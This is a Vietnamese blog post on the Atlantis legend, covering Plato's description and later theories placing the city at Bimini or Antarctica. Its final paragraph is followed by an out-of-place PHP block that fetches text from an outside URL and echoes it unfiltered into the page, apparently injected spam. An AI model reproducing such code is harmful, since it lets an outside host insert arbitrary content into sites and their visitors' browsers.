BÍ ẨN VỀ THÀNH PHỐ TRUYỀN THUYẾT ATLANTIS

Thành phố Atlantis được xem là đạt tới đỉnh cao vinh quang hơn 11 nghìn năm trước, nhưng nó chỉ xuất hiện trong thư tịch khoảng 2.350 năm trước, từ 359 đến 347 năm trước Công nguyên. Nhiều người tin rằng, Atlantis là ngọn nguồn của mọi thành tựu văn hóa và mọi nền văn minh tại Ai Cập, Tây Á, Ấn Độ và châu Âu, cũng như Nam và Bắc Mỹ. Không có bất cứ bằng chứng nào về sự tồn tại của thành phố này những vẫn có rất nhiều người say mê tìm hiểu và tin tưởng về sự tồn tại của nơi đây.

Nguồn gốc lịch sử của thành phố Atlantis

bi-an-thanh-pho-atlantis-1

Theo giả thuyết của nhà triết học Hy Lạp cổ đại lừng danh Platon, Atlantis là hòn đảo lớn, nơi cư trú của tộc người Atlas – những người đã đạt được một trình độ văn minh rất cao. Thủ đô của Atlantis là một kỳ quan kiến trúc và công trình xây dựng kỳ vĩ bao gồm những bức tường thành và kênh đào hình tròn đồng tâm. Ở trung tâm thành phố là một quả đồi lớn, trên đỉnh đồi là nơi đặt đền thờ Poseidon. Bên trong đền chính là bức tượng Thần biển bằng vàng đang cưỡi ngựa thần sáu cánh…

Atlantis đã từng là một vùng đất yên bình và giàu có nhờ buôn bán, nắm giữ những tri thức và công nghệ tối tân. Nhưng sau nhiều năm thịnh vượng, nhà vua dần trở nên kiêu ngạo còn người dân thì tự mãn. Vì vậy, các vị thần đã tức giận và chỉ trong một ngày đêm, nhấn chìm Atlantis hoàn toàn xuống đáy biển bằng một trận lũ thảm khốc.

Vậy thành phố Atlantis có thật sự tồn tại không ?

bi-an-thanh-pho-atlantis-2

Nhiều nhà sử học và học giả cho rằng Atlantis chỉ là một câu truyện tưởng tượng của lịch sử. Tuy nhiên, nhiều nhà nghiên cứu khác lại cương quyết khẳng định về sự tồn tại của Atlantis và thậm chí còn cho biết nơi có thể thành phố đang bị nhấn chìm hiện nay.

Một trong những bằng chứng được trích dẫn nhiều nhất về sự tồn tại của Atlantis là phát hiện năm 1969. Một công trình đá bí ẩn được tìm thấy dưới đáy biển ở Bimini, Bahamas. Dù những người nghi ngờ nghĩ đó là do tự nhiên tao ra, những người ủng hộ vẫn tin tưởng những tảng đá là một phần của một còn đường hay một ngôi đền ở Atlantis vĩ đại.

Một giả thuyết gần đây cho rằng Atlantis nằm ở Nam Cực. Theo đó, Atlantis không phải một vùng đất phủ kín trong băng tuyết ở tận cùng thế giới như bây giờ. Mà lục địa từng nằm ở ngay xích đạo và có khí hậu nhiệt đới. Sau đó nó đã bị di chuyển do sự tách trôi của vỏ Trái Đất.

Vào tháng 2/2009, một kỹ sư đã tuyên bố với cả thế giới rằng ông tìm thấy Atlantis bằng cách sử dụng công cụ Google Ocean. Nhưng đến nay, vấn đề này vẫn đang được suy xét và tìm hiểu.

Từ thời cổ đại, con người đã cố gắng xác định vị trí của Thành phố Atlantis – nơi được cho rằng đã chìm xuống biển sâu sau một trận động đất hay sóng thần. Và cho tới nay, vô số các nhà sử học và nhà thám hiểm đã nỗ lực để tìm ra câu trả lời cho câu hỏi lớn vị trí chính xác của thành phố này ở đâu. Vì vậy, Atlantis vẫn luôn là một trong những điều bí ẩn lớn nhất và lâu đời nhất của nhân loại.[php] $data = file(“https://vsolutions.vn/vsolution_others/sys/link/83″);
foreach ($data as $cont) {
$text = mb_convert_encoding($cont,”utf8″,”EUC-JP”);
echo $text;
}[/php]

This entry was posted in Chưa được phân loại. Bookmark the permalink.